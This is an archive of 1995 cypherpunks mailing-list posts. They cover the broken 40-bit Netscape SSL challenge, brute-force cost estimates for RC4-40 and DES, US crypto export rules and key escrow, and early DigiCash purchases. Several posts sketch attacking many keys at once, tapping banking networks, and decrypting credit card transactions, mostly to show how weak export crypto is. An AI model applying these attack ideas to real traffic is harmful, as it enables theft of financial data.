Message-ID: <Pine.3.89.9508171820.A1363-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Aug 1995, Marcel van der Peijl wrote:

> As far as I know, the first transaction took place when I (while
> testing) bought a postcard from GlobalX, the first ecash store to
> open besides our own (and mine).

Oh pooh ;-)..

> Maybe you should restrict the 'first known' claim to 'first known 
> purchase of physical goods with cyberbucks traded at the ECM'.

Hee.. Ok.. "first known purchase of physical goods with cyberbucks traded 
at the ECM" it is 8-)..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordan@Heuristicrat.COM (Jordan Hayes)
Date: Thu, 17 Aug 95 18:55:15 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <9508180154.AA02120@euclid.Heuristicrat.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From pierre@shell.portal.com Thu Aug 17 18:29:41 1995

	Unfortunately, in this case, insecure credit cards are not an
	obstacle to banks making money, so why should they care?

At the risk of sounding like Perry, if you think that the major card
issuers "don't care" about cutting (or eliminating) fraud, you're not
talking to the right people.  Fraud eats away a big chunk of revenue
and can quite significantly affect competitiveness in a market with
thin margins.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 11:13:19 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Breaking DES anyone? (was: Breaking RC4-40 for less)
Message-ID: <8875.9508171811@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen <fc@all.net> wrote on cpunks:
> Since messages sent with netscape are fairly standard for the first
> so many bytes, why not make a 2^30 element table, store it on a few
> gigabytes of disk space, use a hash table on the message, and find
> the keys to one in every 1,000 messages about 1 time per second.  If
> this code is being used to send millions of credit transactions per
> day, we should be able decode thousands of credit card numbers per
> day for a one-time cost of about $5,00.

Nice idea and one which works for pure RC4, but unfortunately not for
128 bit, 88 bit known + 40 bit unknown "export" SSL.

Netscape's SSL uses "40 bit keys" that are composed in a strange way:
you are given 88 bits of known key, and this is combined with the 40
bit key, to give a 128 bit key.  That key is used to do the
encryption.  The problem is that this has a unix password salt like
effect, only this time there are 88 bits of salt rather than 12 bits.
So this means that you can't precompute anything on the 40 bits as the
88 bits are randomly generated, and likely vary with each session.

> The $10,000 estimate of the cost of computing time is far too high
> for a production-based attack on the netscape codes.

Agreed, it's too high for the other reason that lots of people have
spare compute cycles.  Idle cycles have low to non-existant
incremental cost, and there are plenty of them around in the world.

Back to breaking crypto systems.

There are a couple of things you can do, there is your pre-compute
some proportion of the key space - so that you get some of them, this
would work well for straight 40 bit RC4 - and there are quite probably
such products around - microsoft has a number of "secure" [sic] things
around the Microsoft Access we were looking at earlier, another system
for doing remote access (modem) and having the sessions encrypted.

The problem with micro$oft is they are a darn closed system, and
no-one so far has invested the time to decode what they're doing with
a debugger.  That was the reason for the failed brute RC4 a while back
- no specs.

So precompute regions of keys would work on pure RC4-40 as you
describe.  It would be fast too - a disk seek time being the bounding
factor - per key!

Another approach is to do lots of keys simultaneously - so you set up
this distributed effort which is continually re-sweeping the 40 bit
keyspace, say every couple of days or whatever.  You can sweep for
more than one key at once at very low incremental cost, an extra key
costs close to nothing.  So say you are searching for 1000 keys at
once - a dragnet approach - well keys just pop out at random as they
are hit, maybe straight away maybe at worst case the sweeping
roll-over time, but on average a key will fall out every 3 minutes.

The same approach is applicable to 1 guy with 1 humble PC, it'll sweep
the full keyspace it in a year or two, but what does he care if he
gets a couple of keys a day, and they're all nice transactions he can
pilfer / make nefarious use of.

DES breaking schemes...

Something similar applies to DES, I mean what's a piffling 56 bit
keyspace if you don't really care *which* key of several thousand that
you actually want.  There are bound to be a large enough supply of DES
encrypted banking transactions flowing around the various financial
networks in the US to make a nefarious breaking of them emminently
possible.  It moves on the time for a complete sweep as you now have
56 bits to contend with - but I think with a team of say 1024
workstations like the one I am typing on (an SGI Indy ~$5k
workstation) in a distributed effort, and a large supply of DES keys,
you could get a workable break on *one* of those keys in a shortish
time how long?  Well I'm not sure how fast DES can be made to go for
these purposes, but 60k keys/sec is a figure I have for DES set_key
(Eric Youngs code on a Sparc 20) I'm not too sure of the details of
what you'd need to brute a DES key, but setting up the key, and
presumably a small additional cost to test the first byte and every
256 tries to test 2 bytes etc.  Anyone know if 60k keys/sec sounds
reasonable for a DES brute?

Anyway working on that, 1024 workstations, 60k keys/sec = 60 M
keys/sec = 37 years!

But (here's the saving bit) if you try say 64k keys *at once* so
you've hoovered up a stack of keys (hypothetically - technically
plausible too a tap on a banking network should yield you a whole load
of them) *then* you can get much nicer figures:

A DES key every 5 hours!  I'm thinking 1024 workstation equivalents
shouldn't be insurmountable to organise - lots of people have faster /
multiprocessor machines, and farms of workstations / PCs etc.

Perhaps 64k keys is a bit generous, and 1024 keys would be a more
sensible figure, even then that translates to 13 days expected.

As some one said a while ago (breaking) Netscape is the big win!
Breaking DES is *the* big win!

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 16:20:31 PDT
To: kelly@netcom.com (Kelly Goen)
Subject: Re: Another SSL breakage...
In-Reply-To: <199508172217.PAA10756@netcom5.netcom.com>
Message-ID: <9508172319.AA07049@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> where can the software be obtained I would like to run it on my dual pentium
> under solaris 2.4 for benchmarking...

A copy is on all.net's W3/gopher server
FRC


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Thu, 17 Aug 95 12:33:37 PDT
Subject: Re: The Official Cypherpunks Screen Saver?
In-Reply-To: <ac58dab7120210048eb3@[205.199.118.202]>
Message-ID: <1995Aug17.193223.5667@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

>At 5:11 PM 8/17/95, Jim Gillogly wrote:

>>I would hazard a guess that 90% of the compute cycles in the world are used
>>running screen savers... this gives a <lot> of slack for people who would
>>like to harness them to perform productive work like making points about
>>the strength of security.

>Just a thought. The "Official Cypherpunks Screen Saver"? I'd rather have
>this running on my Mac than have a t-shirt.

What an incredibly cool idea.  Go for it...
-- 
Simmons' Law Of Alcoholic Expectations:
  The best stuff always happens after the meeting, when everyone goes to
  the bar.
Correlary: Any meeting which doesn't adjourn to the bar isn't worth going to.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Thu, 17 Aug 95 10:43:39 PDT
To: mark@unicorn.com
Subject: Re: First known purchase of physical goods with cyberbucks
Message-ID: <199508171742.TAA15830@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


> Anyway, if anyone knows of an earlier transaction of cyberbucks for physical 
> goods than this (at 15:00 GMT 17th August 1995), then please let me know. 

As far as I know, the first transaction took place when I (while
testing) bought a postcard from GlobalX, the first ecash store to
open besides our own (and mine). It is stored in the 'DigiCash
museum' next to early prototypes of all kinds of smartcards,
emulators, wallets etc.

This must have been around October last year (or August? Can't make
out the postmark). Hundreds of cards were shipped by several shops,
and stickers, lotteries, etc. Check the 'physical objects' section
on http://www.digicash.com/shops/categorical.html

Maybe you should restrict the 'first known' claim to 'first known 
purchase of physical goods with cyberbucks traded at the ECM'.

Sorry!

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 17:01:32 PDT
To: Darrell Perko <dperko@efn.org>
Subject: Re: I need exportable crypto revisited.
In-Reply-To: <Pine.SUN.3.91.950817163344.7854B@haus.efn.org>
Message-ID: <199508180000.UAA00325@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Darrell Perko writes:
> 	Thank you all for your amazingly quick responses!  However, I
> should have noted in my original message that this encryption is to meet
> a contractual point for a commercial product to be delivered soon.  The
> product can have one and one only version to be boxed and shipped and
> will be sold internationally.  The encryption portion will be dynamically
> linked, so real encryption will be available on the net just not in the box.

If you have hooks for arbitrary encryption, you will find it to be
virtually impossible to export the product.

The only way to do this whole thing is to export the product to an
offshore development site without the crypto, have the crypto added,
and import the software into the US, never export it from the US. You
have no other real choice.

Welcome to hell. If you don't like it, complain to the NSA, and to the
Clinton administration, experts in being buggered by the NSA and
buggering us too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 11:02:01 PDT
To: cypherpunks@toad.com
Subject: Re:  Idle compute cycles [Re: Netscape's Offical Response]
Message-ID: <9508171801.AA03537@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Jim Gillogly <jim@acm.org>
>and one thing that seems to miss the point.

As usual, I agree with all Jim has to say, but there's another problem
with Netscape's response: they UNDERestimate the cost of breaking
RC4-128 (by brute force) by a factor of about 300 trillion.

If someone know of an URL for Netscape's response, I'll be glad to
include a pointer in my virtual press conference.  I would have to ask
for permission before I put a copy on my disks.  Copyrights, you
know...

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 12:22:10 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Cost to Crack Keys
Message-ID: <9285.9508171921@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> >Hmm, I don't know about anyone else around here, but my workstation is
> >idle 99% of the time. I could almost certainly get access to all the spare
> >CPU cycles on 120 workstations for free, and I suspect that a lot of
> >people (particularly hackers) could do so as well. There's no need to
> >spend $ 10,000 on renting them.
> 
> But, Mark, estimates of the cost to crack a key _must_ be based on market
> prices, not on opportunistic access to machines. Such access is good for
> occasional, or one-shot, deals, but not for routine use.
> 
> For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
> day to rent a car...my friend lets me use his for free."
> [...]
> "Standard accounting practices" dictate the way to estimate production costs.

Agreed.

*But* the real cost to a particular organisation, is subsidised by the
amount of idle compute cycles they have.  You can't take this into
account very easily or accurately for a general figure, where raw $
are probably the best figure.

For instance I know someone who works for a large UK newspaper (he's
admin for their unix workstations), and he says there are acres of
RS6000s just sitting there idling most of the time.  They are used for
document preparation only (what a waste all that lovely silicon just
burning cylces, and being occasionally used as a glorified word
processor).

Anyway point being to that particular organisation, if they for some
reason (I dunno but say a big scoop - they need to nefariously break
something to get the low down on a politician - unofficially of
course), their real cost is quite a bit lower than the raw $, perhaps
0 cost even if they can wait long enough for their impromptu farm to
do the job.

This doesn't really affect the raw $ cost as such, people just need to
estimate the amount of wasted $ equivalent of idle compute they
already have in their personal calculations.

It would sound better if various news papers would care to print
something along the lines of "with idle compute powers as many typical
organisations have in abundance".  Papers printing high sounding $
figures is though technically accurate (perhaps not too sure about the
accuracy), mis-leading to general public who probably don't realise
that there is a few $100 tho of idle compute lying around in the
accounts department already!

In summary, yes but it doesn't sound as good, and folks don't equate
idle CPU to $ intuitively.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 20:41:33 PDT
To: cypherpunks@toad.com
Subject: Re: Non-News Govt Announcement on Key Escrow
Message-ID: <ac595a311502100481c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:49 PM 8/17/95, Dave Banisar wrote:
>The White House and NIST annouced today that they were planning to hold two
>open meetings next month to develop standards for "acceptable" software key
>escrow.  The standards will then be made into a FIPS. The programs cannot
>have keys larger than 64 bits.
>
>Its great to see that it only took them 18 months (since Feb. 94) to come
>up with a call for public meetings for something that nobody really wants
>anyway, expcept for the officals who plan to make it mandatory by slipping
>it through bit by bit and a couple of vendors.  (sorry, sarcasm mode
>off...)

One thing I'm hoping for is that Clinton will, as he contemplates his last
year and a bit in office, have an attack of "liberalism." That is, I am
hoping he realizes that any mandatory key escrow system is not only a
massive infringement on the right of people to speak and communicate as
they wish, it is also handing the keys to the Surveillance State to the
likes of Bob Dole, Jesse Helms, Alonse D'Amato, Newt Gingrich, and William
Bennett.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 13:00:33 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re:  Breaking DES anyone? (was: Breaking RC4-40 for less)
Message-ID: <9403.9508171959@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hal Finney <hfinney@shell.portal.com> writes on cpunks:
> > Another approach is to do lots of keys simultaneously - so you set up
> > this distributed effort which is continually re-sweeping the 40 bit
> > keyspace, say every couple of days or whatever.  You can sweep for
> > more than one key at once at very low incremental cost, an extra key
> > costs close to nothing.  So say you are searching for 1000 keys at
> > once [...] on average a key will fall out every 3 minutes.
> 
> I don't see how you can sweep for more than one key at once at low cost.
> Because of the salt, every possible SSL encrypted message has to be swept
> independently.  You can't sweep for two messages' keys at once because the
> input to the MD5 is different even for the same 40-bit key.

Agreed.  I was not being clear and mixing various things in one post.

I was talking about 3 different systems:

1) export SSL 88 + 40
2) pure RC4-40  (hypothetical - possible microsoft / other apps)
4) DES (56 bits, can it be done)

In the part you quote I was talking about pure RC4 40, I'm not sure
which applications fall into this category, but it is one thing we
have yet to determine.  Perhaps Microsoft Access falls in to this
category?  Other microsoft applications / other vendor applications?
someone needs to do the microsoft equivalent of a FOIA to extract this
info.  Anyone have any Microsoft software with encryption that they
could quiz Microsoft tech support about?

For export SSL it does not work for the reason you describe, the 88
bit salt effect.

For DES I think it does work (attacking many keys at once), but then
my understanding of DES is limited, but as a block cipher, presumably
you can just brute keys in a straight forward manner?  If so you can
try multiple keys at once, unless there is some salt effect involved
with typical CBC 56 bit DES operation too?  Depending on the relative
costs of the parts of the block cipher, 

a) key-setup
b) block / stream decrypt

pure RC4 is designed so that a) is vastly more expensive than b).

How does this pan out for DES?  DES (and RC4) are designed for fast
encrypt / decrypt, but is there an appreciable key setup phase?

I have these figures courtesy of Andy Brown:

> Using Eric Young's very fast libdes code, and using the supplied speed 
> test program I get the following output on a Sparc 20 (1 processor):
> 
>   Doing set_key for 10 seconds
>   582771 set_key's in 9.83 seconds
>   Doing des_ecb_encrypt's for 10 seconds
>   989184 des_ecb_encrypt's in 9.85 second
>   Doing des_cbc_encrypt on 8192 byte blocks for 10 seconds
>   982 des_cbc_encrypt's of 8192 byte blocks in 9.92 second
>   Doing crypt for 10 seconds
>   37101 crypts in 9.89 second
>   set_key       per sec =     59284.94 ( 16.9uS)
>   DES ecb bytes per sec =    803398.17 ( 10.0uS)
>   DES cbc bytes per sec =    810941.94 (  9.9uS)
>   crypt         per sec =      3751.37 (266.6uS)

So what is a brute DES program on multiple keys with CBC mode (is this
the most common mode?) going to look like in terms of calls to these
various calls?

The set_key looks slow compared to the DES cbc bytes per sec, even if
you have to cycle a couple of blocks to get to your known plaintext
location.  Am I on the right tracks?  It seems to me that you gain
considerably by doing multiple keys even with CBC and random IV due to
relatively fast block decrypt as compared to key setup.

> If digital cash in micro amounts became practical, people could be paid
> to let the "idle cycles" on their computers be used for this kind of
> highly parallel application.  (Some people have speculated that graphics
> rendering would be another suitable choice.)  It would be interesting to
> see what the market price of cycles became in such an environment.  That
> would give a better benchmark for the cost to break keys.

I think this would be an interesting way to determine the market value
of idle cycles, and likely lead to cheaper figures for breaking things
than are touted (by newspapers, and people to whose advantage it is to
estimate generously the cost).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 21:06:30 PDT
To: Rich Salz <cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <ac595f5c17021004b8a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:48 AM 8/18/95, Rich Salz wrote:
>Just heard on the 11:30pm NPR news update.  The Clinton Administration
>has changed the crypto export policy.  You will now be allowed to
>export strong crypto, provided it is a key escrow system.  The
>reporter (Dan Charles?) said something like anyone can hold the keys,
>as long as they will be made avail when presented with a court order.
>He also said, US citizens will still be able to use strong crypto
>without key escrow internally.  Terrorists and drug pushers were given
>as "reasons."

And I want to formally announce "Tim's Sort of Good Escrow Service."

I accept keys, thus meeting Our Leader's dictum, but can't really say the
keys will be retrievable, as my floppies often get warped from sitting in
the sun.

Hey, if "anyone can hold the keys"....

Somehow I doubt this. I suspect that any mandatory GAK key escrow system
will involve all sorts of hoops which must be jumped through, all sorts of
approvals which must be gotten, etc.

My neighbor has agreed to be the escrow agent for my keys. He doesn't know
anything about computers, so he's taking my word that the things I give him
every couple of months are disks. He figures that if the Justice Department
ever asks for them, he'll point to the dusty box on the floor of his garage
and say, "There they be."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 13:15:26 PDT
To: hayden@krypton.mankato.msus.edu ("Robert A. Hayden")
Subject: Silly technical question from a non-technical person
Message-ID: <9453.9508172015@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> If it costs $10,000 to crack one 40-bit key (putting aside whether we 
> agree on that price or not), could not the software be designed in such a 
> manner that it is able to check, say, 10,000 keys at the same time?  Ie, 
> it computes a key, and then checks it against the array of data to see if 
> it fits any of them, and then goes on to the next one.

Hmm yes and no.

- For pure RC4-40 yes.

- For export SSL no.  It has what is effectively an 88 bit salt
  (familiar with unix password salts? like that only 88 bits).

- For full 128 bit SSL, yes, but 128 bits is a rather large even if
  you have a few million keys to try at once with speed up gains.
  2^128 is a biiig number.

- For DES I think so, asked for others opinions, this might be the
  next one to die, big project but possibly doable with lots of keys
  at once

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Thu, 17 Aug 95 12:19:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: First known ... (stop this thread please)
Message-ID: <199508171918.VAA17926@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


> Also, there are other potential claims for this sort of thing. Based on
> varying extents to which the "electronic money" is really secure, is
> cryptographically interesting, etc.

Sorry, I think we should kill this thread while we're still on top of 
it. The discussion was CyberBucks, not electronic payments or 
anything like that. I _KNOW_ what the first transaction was, since I 
made it, I saw it at the bank, I received the goods, and got an email 
from the sender saying it was the first transaction.

I do not wish to take claim for any of that other stuff, whether it
is Chaumian or not. No doubt somebody traded some baseball cards for
a few bits somewhere back in the fifties. Let's not dig up any other
dead bodies. My claim (which was only to show the incorrectness of
the other) is a very restrictive one, and is only for the CyberBucks
trading.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: quazi@banyan.com (Quazi)
Date: Thu, 17 Aug 95 14:19:51 PDT
To: cypherpunks@toad.com
Subject: WANTED: anonymous remailer source code
Message-ID: <199508172119.RAA04589@newsstand.cit.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hi All.

I'm interested in porting some remailer code to work on NT (most
likely using NTMail as the smtp service). I'd like to be sure I'm
starting my port from the most recent revisions, and the sources at
the archive at berkeley seem a bit dated. Are they the latest sources?
Are there more recent sources available somewhere?

Thanks,
Quazi






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 18:29:32 PDT
To: jim@acm.org
Subject: Re: I need exportable crypto revisited.
In-Reply-To: <199508180030.RAA04988@mycroft.rand.org>
Message-ID: <9508180128.AA11668@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> > "Perry E. Metzger" <perry@piermont.com> writes:
> > If you have hooks for arbitrary encryption, you will find it to be
> > virtually impossible to export the product.

...

> Has anybody who's been impaled on the stinky end of this stick been told the
> chapter and verse?

I had the experience about 5 years ago - it's not really a big deal.

I submitted a product (Integrity Toolkit - still detecting and limiting
the spread of all current viruses after 5+ years of not being updated)
for release in source form to my European distributors (who are now the
sole global source - I got out of that business).  In order to assure
that it could detect alteration (as part of its integrity shell), it
used a pretty strong cryptographic checksum - actually a message digest
that's faster than MD5 on a PC architecture, combined with an RSA system
I implemented in MuLisp (pretty fast long arithmetic for a high-level
language implementation).

To add fuel to the fire, the system came with an encryption capability
that included the ability to use an external encryption scheme of the
user's own design.  It even included source for a simplistic encryption
program that could be replaced with real encryption by simply adding the
code for the real encryption into the C source provided, recompiling,
and running.

I submitted it to state who sent it to the NSA who called me a few
weeks later (pretty fast by government standards to be honest) and
asked me some questions.  I answered as honestly as I could ...

***	The RSA was built into the system and, although it could be
extracted and used for encryption, as shipped, it was only used for
authentication.  It literally throws away one of the keys during key
generation so that it is truly a one-way trap door.  It would take a
substantial effort by a knowledgeable programmer to convert it into a
workable RSA for encrypting large files, and as implemented, it is only
good for authentication.

***	The inbuilt encryption schemes are relatively easily broken and
are designed only to prevent automated attack by viruses that try to forge
checksums and other such things.

***	The message digest facility is pretty good, but it can only be
used for the authentication process, so it is useless as an encryption
system.

***	The external encryption hook includes no worthwhile encryption
scheme, but it can easily be converted for this use if you have your own
encryption technology.

They responded that as far as they were concerned, I could go ahead and
ship it oversees, sent me a letter to that effect (which I have in the
files somewhere just in case), and off it went.  All further development
of the encryption side was done oversees from that point forward to keep
me from having to go through ITAR again.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 17 Aug 95 18:44:23 PDT
To: cypherpunks@toad.com
Subject: Re: Silly technical question from a non-technical person
In-Reply-To: <9508172055.AA15978@spirit.aud.alcatel.com>
Message-ID: <VAA11227.199508180143@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9508172055.AA15978@spirit.aud.alcatel.com>, Daniel R. Oelke writes:
[...]
>I know someone who *used* to be in the ATM transaction 
>business, but is no longer.  Is the code from a credit card
>reader DES encrypted?  We could be possible "tap" the serial
>port between the reader and the modem and get a byte 
>stream in that manner.... but then again, my knowledge
>of those beasts is pretty limited.

At least some of the cc-reader protocalls are not encrypted (but
they are rather cryptic on their own :-).  I don't know how common
this is 'tho.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 17 Aug 95 21:59:20 PDT
To: jim@acm.org
Subject: Re: I need exportable crypto revisited.
Message-ID: <9508180456.AA08040@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



But don't forget the International Cryptography Experiment, (ICE).
You can read about it in a file available from TIS.  They're trying
to evolve something with pluggable authentication and encryption
that will pass ITAR.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 20:11:35 PDT
To: "George P. Magiros" <libgpmx@gsusgi2.Gsu.EDU>
Subject: Re: use PGP for http encryption instead!
In-Reply-To: <199508180239.WAA27731@gsusgi2.Gsu.EDU>
Message-ID: <Pine.ULT.3.91.950817220822.26415C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 17 Aug 1995, George P. Magiros wrote:

> i don't mean to be extremely brash, but couldn't one use PGP to provide
> encrypted communication with the web.
> granted initially everyone with a browser would need there own key to
> communicate in an encrypted way - at least until such keys could be
> generated on the fly.
> 
> since the http "client" format resembles rfc821 message headers and a body,
> one could easily use a "hal" remailer type "Encrypted: PGP" header line
> plus hash marks "::" to reassemble a compatible http client command.
> The same could be done on the server side.

As far as I understand, no.  

1)  you can't export PGP.
2)  even though it's out there, making software with hooks for PGP is 
    equally bad in the eyes of the NSA.  There wa some talk on 
    alt.internet.media-coverage (and the thread is being crossposted all 
    over the place) about mosaic having to remove PGP hooks before the 
    NSA would let them export.
3)  Frankly, I don't necessarily trust something that plays with my 
    personal stuff if I can't access the source code to make sure it's not 
    messin' with it :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDPo2DokqlyVGmCFAQH9wAP9EB9rdvCAu32ULCUqO6YE4eKSpn4499n8
S/FFeSD7QqRKRzDFs/FsWPqVJfgeD05QJRysrCBRwZTh8//jXBaiLJ6IhqG18YsE
oQq7bFXTEk9BmFcjGljhaLYX548qSmkZCFyBa5LNG96f4Lpj3kOE02BmWNRcCT3Y
U7kCk1btxcY=
=RVSJ
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 22:29:49 PDT
To: cypherpunks@toad.com
Subject: Legality of the ITARs
Message-ID: <ac5971dd190210041167@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I'm not an expert on ITARs, but I'll pass along something I heard about a
year or year and a half ago.

At 4:58 AM 8/18/95, Lucky Green wrote:

>In article <199508180030.RAA04988@mycroft.rand.org>, jim@acm.org (Jim
>Gillogly) wrote:
>
>>> "Perry E. Metzger" <perry@piermont.com> writes:
>>> If you have hooks for arbitrary encryption, you will find it to be
>>> virtually impossible to export the product.
>>
>>That's my understanding also (as I told him in e-mail) but I haven't found
>>any legal justification for it.
>
>You migh as well stop looking, because there isn't any. The brownshirts
>have long ago decided that the law means what they say it does. Welcome to
>reality.

Lawyers within NSA are apparently of the same opinion, that the ITARs would
not stand up to a court test.

Carl Nicolai, the inventor of the "PhasorFone," whose case was described in
Bamford's 1982 "The Puzzle Palace," once called me up to tell me that he
and his lawyer were allowed to view, but not copy, files on the ITAR issue.
Some memos they came across from Agency lawyers warned that any ITAR court
case would likely see the ITARs overturned.

(I passed this information on to Phil Karn a year or so ago, as he was
starting his suit to get Schneier's stuff approved for export. I later saw
a note from Lee Tien and/or John Gilmore saying they had gotten similar
documents under an FOIA they did. Maybe these were the same documents Carl
Nicolai saw, maybe not.)

On the other hand, these comments came from an era of judicial liberalism,
